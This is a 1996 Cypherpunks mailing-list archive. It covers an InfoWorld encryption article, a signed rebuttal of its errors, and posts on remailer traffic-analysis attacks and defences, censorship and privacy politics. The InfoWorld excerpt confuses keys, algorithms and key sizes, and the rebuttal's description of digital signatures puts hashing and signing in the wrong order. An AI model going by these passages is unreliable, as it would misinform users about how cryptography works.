the security of the public/private key system," Kocher explains. RSA remains one of the most well-known encryption technologies, but it is not, by far, the only public/private key exchange method currently in use. For example, other vendors use a competing version called Diffie-Hellman. It is a mathematically different implementation of the asymmetrical model, and it is the method employed by DSN's NetFortress. THE REAL YOU. Using public or public and private keys is the foundation of encryption, but keys can't verify a recipient's identity. "When you're talking about sending secured messages, there are two goals you've got. One is to make sure that the information stays confidential, and the other is that it does not get tampered with," Kocher says. Enter the certificate, also called the digital signature. Certificates act like an electronic driver's license. They authenticate that the receivers and senders are who they say they are. "The issue is trust. When we owned our own 3270 cabling, we trusted it, we worried less. Now I have someone at Daytona Co. that needs access to Chrysler Corp. across multiple networks. What sort of trust do I have?" asks Bob Maskowitz, technical support specialist for Chrysler, in Detroit, and a member of the Internet Architecture Board of the Internet Engineering Task Force (IETF). "I need to authenticate that this person is allowed to update [a document]." Certificates can be created and managed by a third party, such as VeriSign Inc., in Mountain View, Calif., or they can be created and managed internally, with products such as NorTel's Entrust, which also performs encryption. Once a certificate is obtained, it becomes the user's digital signature. When digitally signing something, the recipient of the signature gets all of the information contained on the certificate, such as who the person is, the person's address, or other items chosen to be included on the certificate. The digital signature also says who granted the certificate, when it expires, and what level of verification was done. "There are three classes of certificates," explains Gina Jorasch, director of product marketing for VeriSign. "In Class 1, we check for a unique name, that the e-mail address is correct, and that the person receiving it has authority to access that e-mail account. In Class 2, we check the name, address, driver's license, social security number, and date of birth. For a Class 3 we check all of those things, plus we check against the Equifax [credit reporting bureau] database." Although certificates provide the invaluable service of authenticating users, organizations that care enough about their security to use encryption and certificates may not want to trust an outsider to handle them, according to users. "Do you think Ford [Motor Co.] or Chrysler is going to let someone else control their certificates? Then there is this issue of where did you get your certificate from? Am I going to let you query my database to get a key? No way," Maskowitz says. From a network management perspective, certificates are also an issue. Unless they are outsourced, they will add a significant amount of system management overhead to an encryption system, even with systems such as Entrust that include management features. Most certificates are set to expire in a set amount of time, such as a year. Someone will have to see that they get reissued. Someone will also have to make sure that certificates for employees who leave a company are revoked and that new employee certificates are issued. SMIME'S THE WORD. The final area of concern IS managers face is the new wave of protocols being spewed out by various industry consortiums. Numerous APIs are being created that cover all the aspects of using encryption. Although these APIs are posing as standards, in truth the two most popular APIs for the commercial sector are merely vehicles for the mass adoption of a particular company's key technology. Nevertheless, vendors of products such as e-mail packages are lining up behind them. The four big protocols being worked on are Secure Multipurpose Internet Mail Extensions (SMIME), Multipart Object Security Standard (MOSS), the next-generation version of PGP that allows asymmetrical key exchange, and Message Security Protocol, says Rik Drummond, chairman of the IETF's electronic data interchange over the Internet committee and president of The Drummond Group, a consultancy in Fort Worth, Texas, that helps corporations choose and implement networking and security systems. MOSS is the API for the Department of Defense, and it will be mandatory for anyone in the government or anyone who does business with it. But commercially, SMIME and PGP, Version 3.0, are more robust choices, Drummond says, and they offer features best-suited for the commercial sector, such as backward compatibility, and better key and certificate management capabilities. By far the biggest names in the Internet world have lined up behind SMIME, including Microsoft Corp., which intends to make Microsoft Exchange SMIME-compliant; Netscape; and Qualcomm Inc., maker of the Eudora e-mail package. That makes it a comforting set of protocols to choose because corporations that buy products with SMIME or that purchase SMIME toolkits for customer applications will know that they will be able to communicate with the vast majority of others through a de facto standard. Those using other protocols will be left talking to themselves. Still, SMIME, as it stands now, isn't a panacea. Among its problems is that "the signature is exposed outside the encryption envelope," Maskowitz says. Also, once a message is encrypted with someone else's public key, the sender of the message can't open the message to make changes, Maskowitz adds. The architects of SMIME haven't completed the APIs yet, so there is some possibility that these problems will be fixed but in all likelihood not in time to be included in the first crop of SMIME-compliant applications, due to start rolling out this fall. Even with such serious issues still up in the air, today's encryption and certification products can offer a great deal of protection, especially if the Internet or a wide area intranet is becoming a serious business tool for a particular organization, and it can't wait for a de facto standard to emerge. For those with the time to wait, the learning curve should be ascended now. Mass adoption of encryption technology is a virtual certainty. Those that ignore it will find their secrets being blabbed to the world. -------------------------------- Uses for encryption technology: * Sending sensitive data over publicly owned wide area links; * Sending sensitive data over Internet e-mail; * Electronic commerce; * Electronic data interchange over the Internet; * Order entry/order status over an intranet or the Internet; * Automated access to personnel files; * Storing sensitive data online; * Distribution, newsgroup style, of sensitive data. -------------------------------- Will the export of strong encryption be allowed? One of the problems with adopting encryption worldwide is that the federal government severely restricts its export. In fact, encryption technology is classified as munitions. Therefore, U.S. encryption vendors and corporations are forbidden from exporting and deploying versions that use more than a 40-bit key. However, companies in other countries, such as Japan, can freely sell encryption technology that uses the tougher 1,024-bit standard. The U.S. government isn't completely closing its eyes to the matter. In July, Vice President Al Gore unveiled a proposal that would create a key-escrow system allowing keys greater than 40 bits to be exported but requiring a third party to keep a copy of a key that could be used by law enforcement officials. (See U.S. considers easing encryption export laws.) And this past June, the Senate Subcommittee on Technology, Science, and Space heard a slew of testimony from encryption vendors and other experts on the problem. In fact, there are several bills pending in both houses of Congress that would relax the current export restrictions. The Security and Freedom Through Encryption Act was introduced in the House by Rep. Robert Goodlatte, R-Va. Meanwhile, The Encrypted Communications Privacy Act of 1996 was introduced in the Senate by Sen. Patrick Leahy, D-Vt., and the Promotion of Commerce On-Line in the Digital Era Act of 1996 also sits before the Senate. All three laws would relax the 40-bit restriction on keys as well as eliminate other restrictions on international use and development of encryption. Officials of U.S. corporations look forward to these changes and believe that such changes would improve their ability to compete in the international marketplace. "We're an international company, so we can't use the domestic version of Netscape [Communications Corp.'s Netscape Navigator]. And we can't trust the data using the international versions," says Richard Perlotto, corporate network security manager at VLSI Technology Inc., in Tempe, Ariz. Julie Bort is a free-lance writer based in Dillon, Colo. Please direct your comments to InfoWorld Electric News Editor Dana Gardner. [Image] To respond to this review, go to the forum. [Image] [Image] Copyright � 1996 InfoWorld Publishing Company ------------------------- end silly article -------------------------- --------------------------- begin response --------------------------- -----BEGIN PGP SIGNED MESSAGE----- This references http://www.infoworld.com/cgi-bin/displayStory.pl?960830.crypt.htm Hi, First of all, I'd like to commend InfoWorld for covering a very important topic: cryptography. There are, however, some very significant flaws in the story, which I hope will be corrected soon. As the article exists now, the information is sufficiently incorrect to be more harm than if the article didn't exist at all. Anyone using it as a guide will be only further confused. The quotes are indented two spaces, with my comments below... Although no encryption algorithm is in and of itself crack-proof, several of them are so complex that they are virtually unbreakable. Coupled with proper implementation, authentication, and secure connections, encryption solutions can add a high level of security to any company's arsenal. However, it is an area that requires a knowledgeable person to make the purchasing decision because the technology is very complex, the best product selected will add a level of administration overhead, and numerous industry consortiums are developing competing APIs. Also, there are a lot of people who simply don't know what they're doing when it comes to cryptography and security. Many products claim high degrees of security, but are hardly strong enough to keep someone's kid sister from deciphering the message. The key is the algorithm or mathematical formula that encodes the message itself. It must be sent to the message recipient so the message can be decoded, hence the term key. Bzzzt. The formula is the algorithm. The key is a piece of data (often times, a passphrase, or a relatively small file) that is fed to the algorithm along with the data to be encrypted or decrypted to produce the desired result. The idea being that if an attacker knows what algorithm someone is using, and they have the encrypted message, they'll not be able to break the message unless they can also get their hands on the key. Hence, the key needs to be sufficiently large such that it can't be easily guessed by an attacker trying keys at random (or by effectively starting at "1" and working his way up.) The size of the key, measured in bits, determines how complex the algorithm is and how tough the code is to crack. The state of the art for encryption technology used exclusively within the United States is 1,024 bits. However, the maximum size key that is allowed to be exported is 40 bits. Bzzzt. The complexity of the algorithm and key size are two different matters entirely. The level of complexity, by the way, typically increases the chance for error (in both algorithm design and implementation) more than adding any levels of security. A secure algorithm doesn't have to be complex. However, its key must be of sufficient length to be "computationally infeasable to break." Let's take the example of a bicycle combination lock. It has a chain which will secure the bicycle to a rack; we'll assume that it's some newfangled sort of chain which is resistant to bolt cutters and all of those sorts of things. The security of this lock now rests in the actual locking mechanism. It's a very simple tumbler lock, perhaps having three or four digits between 0 and 9 that collectively make up the combination. The "key" is the combination in this case. The lock is simple, but it can be difficult to break, if the length of the key is long enough. If there is only one digit, there are 10 possible (10**1) keys. An attacker can quickly guess this and have a new bicycle. However, each time a digit is added to the key, it increases the number of combinations an order of magnitude. Two digits will have 100 possible (10**2) keys, three digits will have 1000 (10**3), four will have 10,000 (10**4) possible, etc. The key size necessary to prevent breaking the solution will depend on your attacker. I mentioned the term "computationally infeasable" earlier. The term simply means that more time and money would need to be spent in breaking the key than the value of that which it locks. If a bike combination has 10**8 (100,000,000) possible combinations, and a thief can try 60 combinations per minute, it would take 165 weeks of continuous attempts to try every combination. By that time, enough lawns could be cut to buy two such bikes. Because computers are binary, we work in bases of two, instead of base 10, which the bicycle combination lock uses, but the principle is the same. Each time you add a digit, you increase the number of keys by an order of magnitude (in a binary system, that means you double it, in a base 10 system, you increase it 10 times.) The key size of your algorithm, therefore, must be large enough to prevent an attacker from having any benefit to recovering that which is encrypted. Keys come in two flavors: symmetrical, or public key model; and asymmetrical, or public key/private key model. Symmetric cryptosystems are sometimes known as "conventional." Asymmetric cryptosystems are known as "public key" ciphers. (Public key/private key *is* the public key model, and an asymmetric cipher!) Symmetric ciphers require the same key to encrypt and decrypt. If you imagine the encryption formula on the left side, and decryption on the right, you apply the same key to both sides in order to encrypt or retrieve the plaintext. Hence, the name "symmetric." Systems which use a different key to encrypt from the key to decrypt, therefore, are asymmetrical. The note about key sizes is also misleading: conventional cryptosystems require a much, much smaller key for security than do public key cryptosystems. Because the math is different, a 128 bit key on a conventional algorithm is roughly the same security as a 2304 bit asymmetric cipher key. The "state of the art" in symmetric cryptosystems is about 128 bits. In this type of system, the government does not allow export of keys greater than 40 bits. Using a 1024 bit key in a symmetric cipher would provide an insane level of security, but would also be very, very slow to use. A symmetrical key uses the same algorithm to encode and decode a message. This is the technique used by the public key encryption program Pretty Good Privacy (PGP). This is wrong, I will explain later. PGP assumes what security experts call the peer trust model. That is, the sender knows and trusts the receiver and is therefore perfectly comfortable in sending the key on its way. Herein lies the "pretty good" part of the privacy. Although the algorithm itself makes the message difficult to crack, the key exchange is only pretty good when compared with other methods. VERY WRONG! I'll explain this also later. On the other hand, the great advantage to PGP is that it creates no key management overhead, which is the biggest drawback of asymmetrical keys. Key management is the biggest problem for the keys of symmetric ciphers, not asymetric ciphers. In the asymmetrical model, users have a public key stored somewhere that is available. Should someone want to send an encrypted message, the sender locates the public key of the recipient, encodes the message, and sends it off. The receiver then uses a private key to decode the message. The private key is different from the public key, but they are mathematically linked so that the private key is capable of decoding the message. Entirely correct. Public/private key exchange is the technique used by RSA Data Security Inc., which was recently sold to Security Dynamics Inc., in Bedford, Mass. RSA uses a technology that is actually an adaptation of the decade-old National Institute of Standards and Technology's peer-trust Data Encryption Standard (DES), still used in many products. DES is a method of grabbing random keys for each encryption task, rather than using the same key repeatedly. Cryptographers say that RSA solves some problems, such as the trust issue but generates others. ACK! NO! RSA is an asymmetric cipher. DES is a symmetric cipher. That's the only difference. How keys are managed is entirely dependant on how the system is implemented. Anything can be assigned a key "at random," by allowing a user's passphrase to be the key. Now it seems like a good time to explain the way that PGP (and Netscape's encryption system) works. Asymmetric ciphers, such as RSA, are very slow. Their key management, however, is very nice and flexible, which is why we like to use them. In a system that requires flexible key management, a high level of security, as well as decent performance, both symmetric and asymmetric ciphers are used. If Alice wants to send Bob a message in such a system (like PGP), she simply composes her message, and tells her mailer to PGP-encrypt the message. PGP will find Bob's public key (either from her key ring, or from a database, perhaps, but it doesn't matter.) The message will then be encrypted with a random SYMMETRIC key (in the case of PGP, it will use the 128-bit-key IDEA cipher). That session key, then, will be encrypted using Bob's public key, and both the session key and message will be sent off (in one PGP encrypted message). Bob will see his mail from Alice, and then his PGP will decrypt the session key, and apply it to the encrypted message, yielding the plaintext: Alice's message. So, in PGP, the MESSAGE is encrypted using a random session key (which is symmetric.) The SESSION KEY, then, is encrypted using the recipient's public key. The rest of the article seems to be generally on track, but certificates and signatures have been confused. A certificate is a cryptographically secure message that states the identify of the presenter. In that way, the analogy to a driver's license is correct. A trusted third party issues the certificate. A digital signature, however, is the cryptographic equivalent of signing your name to something. For example, with PGP, I can digitally sign an email message. PGP does this by taking the message, encrypting it with my PRIVATE key, running the result of that through a secure one-way function ("hash"), and attaching the result to the bottom of the message. A user can then verify that the signature is legitimate by applying my PUBLIC key to the message, and running the result back through the hash, and comparing the two. If they match, the signature is good, if not, something is amiss. (PGP, naturally, handles all of this automatically.) Therefore, U.S. encryption vendors and corporations are forbidden from exporting and deploying versions that use more than a 40-bit key. However, companies in other countries, such as Japan, can freely sell encryption technology that uses the tougher 1,024-bit standard. The two are being confused again. See my earlier note about comparable keys. If you have further questions, please feel free to contact me. If there is interest, I would also be willing to write a series on how to choose a cryptosystem. I am very concerned about the state of cryptographic knowledge in the industry. The area is vital for successful companies' IS departments to understand, and understand well. Yet, the general level of knowledge is abysmally low. I applaud efforts by InfoWorld to increase coverage of this important topic, but I emphasize that the material presented must be correct. Many vendors are currently offering solutions they call secure. Without an understanding of how cryptography works, an IS organization is completely unable to choose between that which is good security and that which is snake oil. A "snake oil FAQ" is being drafted, but is not yet available. In the mean time, there are cryptography FAQs available from ftp://rtfm.mit.edu/pub/usenet-by-group/sci.crypt/ - -- C Matthew Curtin MEGASOFT, INC Chief Scientist I speak only for myself. Don't whine to anyone but me about anything I say. Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet cmcurtin at research.megasoft.com http://research.megasoft.com/people/cmcurtin/ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Have you encrypted your data today? iQEVAwUBMireN36R34u/f3zNAQF+BQf/XD0fPYFuOQsd+u2k4zE1UpfZQKaP+SDw RUhx6R7LnD0ZK5dA+seStvsLl+cvg5tu2wMzf9bniS7taj2DHwmu8MDWYwJPnQST Iiti6XBAoFjCJYWaVghHQzVKw8vxlNC20LzyJ791PdabpUo5ztpf+AXVHGAfWaTg F3ZNYWbbyxg81uxAnKMM/Li6NOKJhcE6nNO+eHUMFLciFki+mz/mOT45fUPs0R9y 4UYLQDvcSVAt246xSufwqbrSY/4dUB3A7KjYvbqWUjYRF/40c1h3K6h69dDnOR/8 SY+AZNnZSzQZbMbHNpjlJ+E71Yz+9Ppvgl6Eeo7oqa+PNeYW0W9GMQ== =PS8M -----END PGP SIGNATURE----- ---------------------------- end response ---------------------------- -- C Matthew Curtin MEGASOFT, INC Chief Scientist I speak only for myself. Don't whine to anyone but me about anything I say. Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet cmcurtin at research.megasoft.com http://research.megasoft.com/people/cmcurtin/ From jwilk at iglou.com Mon Sep 2 11:44:22 1996 From: jwilk at iglou.com (Blake Wehlage) Date: Tue, 3 Sep 1996 02:44:22 +0800 Subject: free speech online Message-ID: At 02:47 AM 9/2/96 EDT, patrick b cummings wrote: >I agree that their should be free speech on the net. Someone should >start a petition and get as many people to sign it as possible. > Patrick.... i have a deal for ya.... you don't write this list for a week? or at least keep the spams to a minimum. Post the hacker requests to a hacker-mailing list (what a concept). Have a nice day! ========================================== Blake Wehlage World's Youngest Cypherpunk 2400bps is the net's old people drivers From whgiii at amaranth.com Mon Sep 2 11:44:25 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Tue, 3 Sep 1996 02:44:25 +0800 Subject: Cypherpunk Mailboxes? Message-ID: <199609021534.KAA26279@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- Hi, I have a thought for addressing the anon. problem. We could create a network of anonymous remailers with mailboxes. All messages in the mailboxes are stored encrypted. No information about the users are keep. Users would be be given x K of mailbox space. We could use PGP keys for encrypting the messages. Each user would have his own key pair for his anonymous mailbox. Any plain text messages received to the server would be encrypted on recept. Let the government's subpoena away. :) "Sorry we don't have user addresses, no I can't decrypt those messages Senator." What do you think? - -- - ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info - ----------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMisGh49Co1n+aLhhAQHvAgP/aLktPSyoj3Ps7OnJ2LXlSIJJQq+B3GiA TlGFJ/DZVF9Ai9rKMzjgmTiukLY/+Hf58vrw7QjJA7wp/fcGOZoYNnMt0mW09wsp biUtXnMkX86sW2abtazy6U3f+DR15lGi9S2F0dvZERmFCdUX5Yi5geoa31Zezght Sj/0sFT+AUk= =7tw/ -----END PGP SIGNATURE----- From pjb at 23kgroup.com Mon Sep 2 11:48:41 1996 From: pjb at 23kgroup.com (Paul J. Bell) Date: Tue, 3 Sep 1996 02:48:41 +0800 Subject: Moscowchannel.com hack Message-ID: <9609021545.AA15755@23kgroup.com> FWIW, not even root can unmount a file system that is busy. -paul > From cypherpunks-errors at toad.com Sun Sep 1 18:17:12 1996 > Subject: Re: Moscowchannel.com hack > To: snow at smoke.suba.com (snow) > Date: Sun, 1 Sep 1996 10:09:32 -0500 (CDT) > Cc: joelm at eskimo.com, Cypherpunks at toad.com > Reply-To: ichudov at algebra.com (Igor Chudov) > From: ichudov at algebra.com (Igor Chudov @ home) > X-No-Archive: yes > Organization: Bool Sheet Software > X-Mailer: ELM [version 2.4 PL24 ME7] > Content-Type> : > text> > Sender: owner-cypherpunks at toad.com > Content-Length: 689 > > snow wrote: > > > > On Sat, 31 Aug 1996, Joel McNamara wrote: > > > > > Not really crypto, but related to the DOJ hack in a way. > > > > > > Moscow Channel is a pretty slick, Russian news/commentary page. Their Web > > > site was hacked and altered by someone who didn't seem to like Russians all > > > Just a matter of time before some builds a dedicated Satan type tool that > > > scans for HTTP server holes or messed up file permissions to make locating > > > potential victims easy. > > Write your web site to a CD-ROM and hard-code the base directory into the > > webserver. > > A hacker who has root can forcibly unmount the cdrom and mount another > directory on that node. Not a good solution. > > - Igor. > From ichudov at algebra.com Mon Sep 2 11:56:30 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Tue, 3 Sep 1996 02:56:30 +0800 Subject: Moscowchannel.com hack In-Reply-To: <9609021545.AA15755@23kgroup.com> Message-ID: <199609021606.LAA06211@manifold.algebra.com> Paul J. Bell wrote: > > FWIW, not even root can unmount a file system that is busy. > > -paul Well, root can kill all processes that use the mounted directory. igor > > > From cypherpunks-errors at toad.com Sun Sep 1 18:17:12 1996 > > Subject: Re: Moscowchannel.com hack > > To: snow at smoke.suba.com (snow) > > Date: Sun, 1 Sep 1996 10:09:32 -0500 (CDT) > > Cc: joelm at eskimo.com, Cypherpunks at toad.com > > Reply-To: ichudov at algebra.com (Igor Chudov) > > From: ichudov at algebra.com (Igor Chudov @ home) > > X-No-Archive: yes > > Organization: Bool Sheet Software > > X-Mailer: ELM [version 2.4 PL24 ME7] > > Content-Type> : > text> > > Sender: owner-cypherpunks at toad.com > > Content-Length: 689 > > > > snow wrote: > > > > > > On Sat, 31 Aug 1996, Joel McNamara wrote: > > > > > > > Not really crypto, but related to the DOJ hack in a way. > > > > > > > > Moscow Channel is a pretty slick, Russian news/commentary page. Their Web > > > > site was hacked and altered by someone who didn't seem to like Russians all > > > > Just a matter of time before some builds a dedicated Satan type tool that > > > > scans for HTTP server holes or messed up file permissions to make locating > > > > potential victims easy. > > > Write your web site to a CD-ROM and hard-code the base directory into the > > > webserver. > > > > A hacker who has root can forcibly unmount the cdrom and mount another > > directory on that node. Not a good solution. > > > > - Igor. > > > - Igor. From mycroft at actrix.gen.nz Mon Sep 2 12:00:17 1996 From: mycroft at actrix.gen.nz (Paul Foley) Date: Tue, 3 Sep 1996 03:00:17 +0800 Subject: Free Speech and List Topics In-Reply-To: <199609020517.WAA06504@netcom.netcom.com> Message-ID: <199609021414.CAA29655@mycroft.actrix.gen.nz> qut at netcom.com (Dave Harman OBC) wrote: How about supporting the effort for comp.cypherpunks ? God forbid. Isn't there enough off-topic noise on the list for you? I'd be glad to email you a bunch of "MAKE MONEY FA$T" and "Want XXX pictures in your mailbox?" messages every day, if not. About the need for limits for anonymity, guess what brought that on? Crime? Yes! The crime of the media monopoly violating the anti-trust acts, because people are ignorant enough to trust the mass media for their news. huh? -- Paul Foley --- PGPmail preferred PGP key ID 0x1CA3386D available from keyservers fingerprint = 4A 76 83 D8 99 BC ED 33 C5 02 81 C9 BF 7A 91 E8 ---------------------------------------------------------------------- Without freedom of choice there is no creativity. -- Kirk, "The return of the Archons", stardate 3157.4 From declan at eff.org Mon Sep 2 12:39:48 1996 From: declan at eff.org (Declan McCullagh) Date: Tue, 3 Sep 1996 03:39:48 +0800 Subject: Bob Dole on Drugs In-Reply-To: <199609011633.LAA30982@manifold.algebra.com> Message-ID: The Post also noted -- and this was buried inside in a short article -- that Clinton had stepped up his attacks on drugs during his acceptance speech, which I intentionally missed. -Declan On Sun, 1 Sep 1996 ichudov at algebra.com wrote: > http://allpolitics.com/news/9608/31/radio.addresses/ > > ... snip ... > > Dole, who returned to Washington for Labor Day > weekend, also pledged to use the White House as a > bully pulpit to promote the "moral message" > against drugs and to criticize what he called the > entertainment industry's glamorization of drug use. > > On Sunday, he is to address the convention of the > National Guard Association of the United States > during which he's expected to propose that the > military be enlisted to assist in a renewed war on > drugs. > // declan at eff.org // I do not represent the EFF // declan at well.com // From eitland at blue.weeg.uiowa.edu Mon Sep 2 12:44:14 1996 From: eitland at blue.weeg.uiowa.edu (Brett Eitland) Date: Tue, 3 Sep 1996 03:44:14 +0800 Subject: desubscribe Message-ID: <322B2CF6.ECD@blue.weeg.uiowa.edu> desubscribe From ccarper at microsoft.com Mon Sep 2 12:49:58 1996 From: ccarper at microsoft.com (Christopher Carper) Date: Tue, 3 Sep 1996 03:49:58 +0800 Subject: desubscribe Message-ID: desubscribe From tcmay at got.net Mon Sep 2 12:51:40 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 3 Sep 1996 03:51:40 +0800 Subject: Sharp Knives Message-ID: At 1:38 PM 9/2/96, Dave Harman OBC wrote: >In California, it's a felony to merely *own* a Ninja star. It's a >felony to carry a *concealed* knife, but carrying it openly in a >holster is legal. It's a felony for most people to carry a >concealed loaded handgun on the street only on a *second* offense. >It'a a felony to merely *own* a switchblade, brass knuckles, etc. >Do our weapons laws sound strange? Are many of our weapons laws >stricter than countries like Sweden? Yes! Most laws about knives, dirks, daggers, brass knuckles, saps, etc. were devised to control the coloreds, who could not afford the weapons of choice of whites and other gentlemen. Hence, a colored who gets picked up on some charge, or detained, can be jailed on a felony charge for having a pocketknife, or a sap, or brass knucks. Coloreds from Asia can be jailed for having the martial arts sorts of weapons. A white gets a misdemeanor charge for carrying a gun. (This analysis is not original with me. The gun magazines have noted the racist origins of misdemeanor/felony dichotomies for many years. One article I read a few years ago traced the precise times at which these laws came into being...mostly the times in various states corresponded with periods of high immigration of coloreds to major cities.) Here in California there's a bill pending in the legislature which would decriminalize the carrying of a pocketknife that can be opened with one hand (a la the Spyderco, Benchmade, Buck, Cold Steel, etc., knives with thumb holes or studs). Even though such knives are openly sold in every sporting goods store I have ever been in, and are carrried by a truly large fraction of the population, such knives are currently classified as "switchblades" and can be prosecuted as a felony. A good way to selectively harasss someone. Interestingly, it was the District Attorneys lobbying group in California which made the difference: they argued that such laws are unenforceable or are selectively enforced. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From aba at dcs.ex.ac.uk Mon Sep 2 13:03:46 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Tue, 3 Sep 1996 04:03:46 +0800 Subject: strengthening remailer protocols In-Reply-To: <9608231805.AA01523@clare.risley.aeat.co.uk> Message-ID: <199609011430.PAA00133@server.test.net> Peter Allan writes on cpunks: > [re-encrypting as a mechanism to prevent an attacker in a spamming > attack reconizing his own messages] The attack Peter is hoping to frustrate is as follows: target message being sent from Alice to Bob through remailer R. The attacker in an active `spam' attack floods remailer R so that he will recognize the target message and it's destination. Another approach to making the transmitted message unrecognizable to it's owner would be to finish the implementation of D-H key exchange in mixmaster. (The version I am looking at (2.0.3) does not have the D-H key exchange and direct socket communication implemented, rather it delivers mail by sendmail, I believe). As a bonus this provides forward secrecy, so that not even a supeonaed remailer operator would be able to reconstruct the destination. You can still do a spamming attack by recognizing the destination, rather than the message: Eve forwards enough messages to remailer R to flush the target message. Each of Eves messages is headed to a known (to Eve) address. Say the remailer R has a buffer of 10 messages, if Eve sends 9 messages, 3 to each of remailers R2, R3, and R4. Eve can then determine the destination of the target message: the remailer which gets 4 messages is the destination remailer. (Here my knowledge of mixmasters workings are wearing thin, but I believe it does these things, or provides facilities so that the operators/users can make sure these things happen). The way that this kind of attack is frustrated is that dummy messages are created as cover traffic by the remailer, and that at some points messages can be swallowed by a remailer as junk messages. Sufficient junk cover traffic would ensure that even with a spamming attack the destination would not be known immediately because the attacker can distinguish the target message from the junk. Ultimately a good way to foil this attack in general is to have each remailer send a fixed amount of mail to each other remailer in cycles. No traffic analysis if all remailers get equal traffic. The only entry point for analysis then is the entry and exit points. The active spam attack then would be to block, or delay all entry points into the remailer net, apart from the target message. The only messages in the network would then be the spam traffic, and the target message. When the target message leaves the net, the Eve knows the destination. To hinder this attack, the remailers could generate and mail to previous users junk mail. Over a long time, statistical attacks could perhaps be built on a pair of users who communicated frequently. The ultimate solution to this is for the users also to receive fixed amounts of junk each day. Starting to sound like similar overheads to a DC net, huh? Peters other suggestions of adding random diversions sound like reasonable ways to add another form of cover traffic, and should help make life harder for the attacker, Adam -- #!/bin/perl -sp0777i At 6:29 AM 9/2/96, Bill Stewart wrote: >While Tim's article title was clearly intended to be provocative, Indeed, I write many things to be _provocative_. Not to be insulting, but to challenge orthodoxies. And when I hear mealy-mouthed platitudes along the lines of "foreigners do not understand the special needs of our nation, and do not understand why Benevolent Father Yew channels our thoughts in more productive directions," I have to call a spade a spade. (quoting James Seng) >>In addition, you need to see the method of censorship deployed in >>Singapore. For press media like papers and magazine, it is done in a >>passive manner. They _do not_ read every issue of every magazine available >>in Singapore. They only do so when there is enough complains. > >This also means you don't know what is safe to print and what isn't. >You have to restrict yourself very strongly, because otherwise >some politically influential person will complain to the government, >and you go to jail. At least if the government tells you what >the rules are, you know it's safe to say things that don't violate them. Yes, what James Seng calls a "passive manner" is often worse than censorship in a direct manner. Psychologists would mention "random reinforcement" at this point. When there is _direct_ censorship, with clearly defined rules, publishers will skate as close to the edge of the envelope as they can, and even test the limits. When there is _passive_ or _vague_ censorship, with rules not carefully spelled out but with the possibility of prosecution and jail time always looming, then publishers and others will rein themselves in, taking the cautious route. This is, of course, often the result desired, that people invoke "the policeman inside" (to use the Burroughs term). This is really the essence of a "terror state." The rules are not known, the fear of a knock on the door is omnipresent, and the Beloved Ruler may dispatch his enforcers on a whim. >>ps: Sorry for the off-topic discussion. > >It's not off-topic. Building tools to prevent censorship is >distinctly on-topic for cypherpunks, and an occasional digression into >whether it's a good idea is worthwhile. Exactly. A discussion of routing-around Censorpore's policies is at least as on-topic as the 17th discussion of some snake oil cipher. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From banisar at epic.org Mon Sep 2 13:14:51 1996 From: banisar at epic.org (Dave Banisar) Date: Tue, 3 Sep 1996 04:14:51 +0800 Subject: National ID Card Web Pages Message-ID: EXTENSIVE NATIONAL ID CARD WEB SITE IS NOW ON LINE The London-based human rights watchdog Privacy International (PI) has just opened an extensive web page on National ID cards. The initiative comes in the wake of pending efforts in the United States, Canada and United Kingdom to implement national ID card systems. The page contains a 7,000 word FAQ (Frequently Asked Questions) on all aspects of ID cards and their implications. Also included in the PI documents is a paper describing successful campaigns opposing to ID cards in Australia and other countries. The page also has links to numerous other sites and documents. PI Director Simon Davies said he hoped the page would help promote debate about the cards, "ID cards are often introduced without serious discussion or consultation. The implications are profound, and countries planning to introduce them should proceed with caution." "The existence of a card challenges important precepts of individual rights and privacy. At a symbolic and a functional level, ID cards are often an unnecessary and potentially dangerous white elephant. They are promoted by way of fear-mongering and false patriotism, and are implemented with scant regard for serious investigation of the consequences." he said. The URL is : http://www.privacy.org/pi/activities/idcard/ PI has also set up an auto response function for the FAQ document. Its address is: idcardfaq at mail.privacy.org Privacy International is an international human rights group concerned with privacy and surveillance issues. It is based in London, UK. For further information contact the Privacy International Washington Office at +1.202.544.9240 or email pi at privacy.org. PI's web page is available at: http://www.privacy.org/pi/ _________________________________________________________________________ Subject: National ID Card Web Pages _________________________________________________________________________ David Banisar (Banisar at privacy.org) * 202-544-9240 (tel) Privacy International Washington Office * 202-547-5482 (fax) 666 Pennsylvania Ave, SE, Suite 301 * HTTP://www.privacy.org/pi/ Washington, DC 20003 From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 2 13:14:52 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Tue, 3 Sep 1996 04:14:52 +0800 Subject: Modem tax again? Message-ID: <01I9075ZGV3O9JDI20@mbcl.rutgers.edu> As I recall, the alleged "subsidy" consists of lack of payments so rural areas can have subsidized phone service - thus making their costs borne by everyone else. -Allen > _________________________________________________________________ > Avis > _________________________________________________________________ > INTERNET IS HURTING PHONE NETWORKS, STUDY SAYS > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 